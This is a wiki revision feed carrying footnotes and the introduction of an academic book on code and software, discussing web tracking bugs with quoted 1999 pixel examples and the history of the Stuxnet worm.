[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4995</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4995"/>
		<updated>2012-06-21T11:13:46Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. For example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, yet nonetheless having concrete effects. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. Although it is useful to note that theorists, such as Frabetti (2010), problematise Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
